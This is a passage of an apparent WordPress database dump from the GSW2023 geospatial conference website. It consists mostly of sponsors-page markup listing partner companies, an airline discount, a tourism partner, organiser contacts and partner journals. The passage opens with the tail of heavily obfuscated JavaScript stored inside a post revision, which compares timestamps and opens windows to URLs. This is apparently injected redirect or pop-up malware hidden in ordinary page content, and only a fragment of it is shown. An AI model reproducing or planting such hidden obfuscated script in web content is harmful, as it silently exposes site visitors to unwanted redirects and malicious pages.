_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:32:28','2023-08-16 00:32:28','',3066,'https://gsw2023.com/?p=5262',0,'revision','',0),
(5263,1,'2023-08-16 00:32:59','2023-08-16 00:32:59','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145871449{margin-top: -50px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: 